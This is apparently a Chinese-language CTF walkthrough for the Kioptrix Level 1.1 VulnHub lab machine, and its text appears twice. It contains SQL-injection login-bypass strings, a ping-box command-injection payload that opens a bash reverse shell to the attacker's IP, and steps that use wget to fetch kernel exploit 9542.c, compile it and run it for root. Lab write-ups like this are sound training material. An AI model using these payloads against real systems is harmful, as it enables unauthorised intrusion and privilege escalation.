本文记录了Kioptrix Level 1.1靶机的完整详细渗透测试过程包括信息收集、漏洞发现、获取shell以及提权至root的方法。靶机下载链接https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar靶机名称:Kioptrix Level 1.1测试时间2026/3/18如果遇到查找不到靶机的情况参考这篇文章的开头部分https://blog.csdn.net/uhszjhshdjsjsj/article/details/159168830?spm1001.2014.3001.5501一.概述查询攻击机kaliIP:ifconfig得到攻击机(kali)IP192.168.253.166查询靶机IPnmap-sn192.168.253.00/24或netdiscover-r192.168.253.00/24得到靶机IP192.168.253.169二. 信息收集1.扫描全部端口nmap-A-p1-64000192.168.253.169得到开放端口有22: ssh服务用于远程登录80网页默认的 HTTP 端口111远程调用另一台机器函数443HTTPS端口631打印系统注意允许使用PUT方法待会或许是个突破口3306MYSQL2.Web网页目录扫描dirb http://192.168.253.169 或者 dirsearch-uhttp://192.168.253.169-x404,403,400发现有一个manual/index.html目录这是Apache 自带的官方文档页面3.web指纹识别whatweb http://192.168.253.169因为靶机古老所以运行着老版本服务器状态码 200 说明页面可正常访问4.查看服务器响应头curl-ihttp://192.168.253.169看来页面是一个登录系统5.打开网页收集信息网址直接输入192.168.253.169即可访问这是一个登录系统看到这个就要先尝试弱密码和SQL注入先用admin;123456这类的弱密码尝试一遍发现失败了再用sql注入尝试想快速入门sql注入基础的可参考SQL注入基础版详解一小时教会你用各个基础注入查询数据这里提供两种输入并不代表只有两种第一种用万能密码输入用户名’ or ‘a’’a密码 or 11第二种用万能密码 or 11-- -注意这里面第二个-和第三个-中间隔着一个空格而不是三个-连一起输入任意一个框另一个框随便输均发现成功登录这里我简单解释一下万能密码的SQL注入原理假设SQL代码是SELECT*FROMusersWHEREusername$unameANDpassword$psw;当我们输入第一种这两个万能密码代码变成SELECT*FROMusersWHEREusernameoraaANDpasswordor11;因为AND优先级大于OR所以代码即变成(usernameoraa)AND(passwordor11)进而分成两个username()or(aa)password()or(11)因为or左边部分闭合右边部分aa和11恒为真所以构成万能密码第二种输入 or 11-- -代码变成usernameor11-- - AND password123注意后半段的代码变成了灰色部分这是因为-- –后面有空格)是注释符会把后面的代码注释掉类似于写代码时用#写注释,所以这里改成 or 11#也可以注释后or后面的11恒真所以也构成万能密码进去后发现提示输入ping命令看到这种带ping的输入框就要首先考虑命令注入和XSS命令注入就是IP 分隔符 命令分隔符有许多种常见的分隔符有;.. .||. |..$()等等有时候还需要用编码绕过过滤所以我们一个一个尝试输入127.0.0.1;id看底下说明命令执行成功那我们直接输入反弹shell命令127.0.0.1;bash -i /dev/tcp/192.168.253.166/1234 01并且在终端监听nc-lnvp1234成功监听三. 漏洞发现与利用Web漏洞漏洞类型SQL注入ping命令注入漏洞利用过程1.发现网页需要输入用户名和密码尝试sql注入成功登录2.发现需要输入ping命令所以和其他命令结合输入成功得到反弹shell四. 权限提升升级得到一个交互更好的bashpython-cimport pty; pty.spawn(/bin/bash)用id或whoami查看自己身份查看内核版本uname-a同样查看版本lsb_release-a版本很低我们直接进行内核提权新建一个终端搜索提权漏洞searchsploit centos4.5根据刚才查到的版本号搜索我们看到第二个漏洞9542.c也符合我们的linux内核版本下载文件到kalisearchsploit-m9542.c下载成功共享目录文件python3-mhttp.server回到靶机下载文件wgethttp://192.168.253.166:8000/9542.c但是结果显示我们没有写权限我们输入cd /tmp进入到/tmp目录因为这个目录有写权限然后再进行下载wgethttp://192.168.253.166:8000/9542.c这回下载成功编译文件-o 9542 表示指定编译输出的可执行文件名为 9542之后可以通过 ./9542 命令运行它gcc-o95429542.c执行文件./9542输入id发现已经得到root权限五.总结与反思本次测试主要难点Web 入口突破面对一个登录页面没有现成的密码。需要灵活运用 SQL 注入技巧万能密码来绕过认证。命令注入的探测与利用在获得后台的 ping 命令执行框后如何找到正确的命令分隔符;并成功执行自定义命令同时要避免被可能的输入过滤机制拦截。学到的技巧SQL 注入实战通过万能密码 ’ or 11-- 成功登录加深了对 SQL 查询结构、单引号闭合、注释符 (-- ) 以及 AND/OR 优先级的理解。命令注入掌握了在 Web 表单中通过命令分隔符拼接恶意系统命令的方法并成功获得初始 shell。该靶机漏洞出现在80端口(通过sql注入成功登录系统利用了命令注入获取反弹shell提权是通过内核旧版本漏洞提权成功
【Kioptrix Level 1.1渗透测试手把手超详细教程附下载链接】
发布时间:2026/6/15 11:59:37
本文记录了Kioptrix Level 1.1靶机的完整详细渗透测试过程包括信息收集、漏洞发现、获取shell以及提权至root的方法。靶机下载链接https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar靶机名称:Kioptrix Level 1.1测试时间2026/3/18如果遇到查找不到靶机的情况参考这篇文章的开头部分https://blog.csdn.net/uhszjhshdjsjsj/article/details/159168830?spm1001.2014.3001.5501一.概述查询攻击机kaliIP:ifconfig得到攻击机(kali)IP192.168.253.166查询靶机IPnmap-sn192.168.253.00/24或netdiscover-r192.168.253.00/24得到靶机IP192.168.253.169二. 信息收集1.扫描全部端口nmap-A-p1-64000192.168.253.169得到开放端口有22: ssh服务用于远程登录80网页默认的 HTTP 端口111远程调用另一台机器函数443HTTPS端口631打印系统注意允许使用PUT方法待会或许是个突破口3306MYSQL2.Web网页目录扫描dirb http://192.168.253.169 或者 dirsearch-uhttp://192.168.253.169-x404,403,400发现有一个manual/index.html目录这是Apache 自带的官方文档页面3.web指纹识别whatweb http://192.168.253.169因为靶机古老所以运行着老版本服务器状态码 200 说明页面可正常访问4.查看服务器响应头curl-ihttp://192.168.253.169看来页面是一个登录系统5.打开网页收集信息网址直接输入192.168.253.169即可访问这是一个登录系统看到这个就要先尝试弱密码和SQL注入先用admin;123456这类的弱密码尝试一遍发现失败了再用sql注入尝试想快速入门sql注入基础的可参考SQL注入基础版详解一小时教会你用各个基础注入查询数据这里提供两种输入并不代表只有两种第一种用万能密码输入用户名’ or ‘a’’a密码 or 11第二种用万能密码 or 11-- -注意这里面第二个-和第三个-中间隔着一个空格而不是三个-连一起输入任意一个框另一个框随便输均发现成功登录这里我简单解释一下万能密码的SQL注入原理假设SQL代码是SELECT*FROMusersWHEREusername$unameANDpassword$psw;当我们输入第一种这两个万能密码代码变成SELECT*FROMusersWHEREusernameoraaANDpasswordor11;因为AND优先级大于OR所以代码即变成(usernameoraa)AND(passwordor11)进而分成两个username()or(aa)password()or(11)因为or左边部分闭合右边部分aa和11恒为真所以构成万能密码第二种输入 or 11-- -代码变成usernameor11-- - AND password123注意后半段的代码变成了灰色部分这是因为-- –后面有空格)是注释符会把后面的代码注释掉类似于写代码时用#写注释,所以这里改成 or 11#也可以注释后or后面的11恒真所以也构成万能密码进去后发现提示输入ping命令看到这种带ping的输入框就要首先考虑命令注入和XSS命令注入就是IP 分隔符 命令分隔符有许多种常见的分隔符有;.. .||. |..$()等等有时候还需要用编码绕过过滤所以我们一个一个尝试输入127.0.0.1;id看底下说明命令执行成功那我们直接输入反弹shell命令127.0.0.1;bash -i /dev/tcp/192.168.253.166/1234 01并且在终端监听nc-lnvp1234成功监听三. 漏洞发现与利用Web漏洞漏洞类型SQL注入ping命令注入漏洞利用过程1.发现网页需要输入用户名和密码尝试sql注入成功登录2.发现需要输入ping命令所以和其他命令结合输入成功得到反弹shell四. 权限提升升级得到一个交互更好的bashpython-cimport pty; pty.spawn(/bin/bash)用id或whoami查看自己身份查看内核版本uname-a同样查看版本lsb_release-a版本很低我们直接进行内核提权新建一个终端搜索提权漏洞searchsploit centos4.5根据刚才查到的版本号搜索我们看到第二个漏洞9542.c也符合我们的linux内核版本下载文件到kalisearchsploit-m9542.c下载成功共享目录文件python3-mhttp.server回到靶机下载文件wgethttp://192.168.253.166:8000/9542.c但是结果显示我们没有写权限我们输入cd /tmp进入到/tmp目录因为这个目录有写权限然后再进行下载wgethttp://192.168.253.166:8000/9542.c这回下载成功编译文件-o 9542 表示指定编译输出的可执行文件名为 9542之后可以通过 ./9542 命令运行它gcc-o95429542.c执行文件./9542输入id发现已经得到root权限五.总结与反思本次测试主要难点Web 入口突破面对一个登录页面没有现成的密码。需要灵活运用 SQL 注入技巧万能密码来绕过认证。命令注入的探测与利用在获得后台的 ping 命令执行框后如何找到正确的命令分隔符;并成功执行自定义命令同时要避免被可能的输入过滤机制拦截。学到的技巧SQL 注入实战通过万能密码 ’ or 11-- 成功登录加深了对 SQL 查询结构、单引号闭合、注释符 (-- ) 以及 AND/OR 优先级的理解。命令注入掌握了在 Web 表单中通过命令分隔符拼接恶意系统命令的方法并成功获得初始 shell。该靶机漏洞出现在80端口(通过sql注入成功登录系统利用了命令注入获取反弹shell提权是通过内核旧版本漏洞提权成功
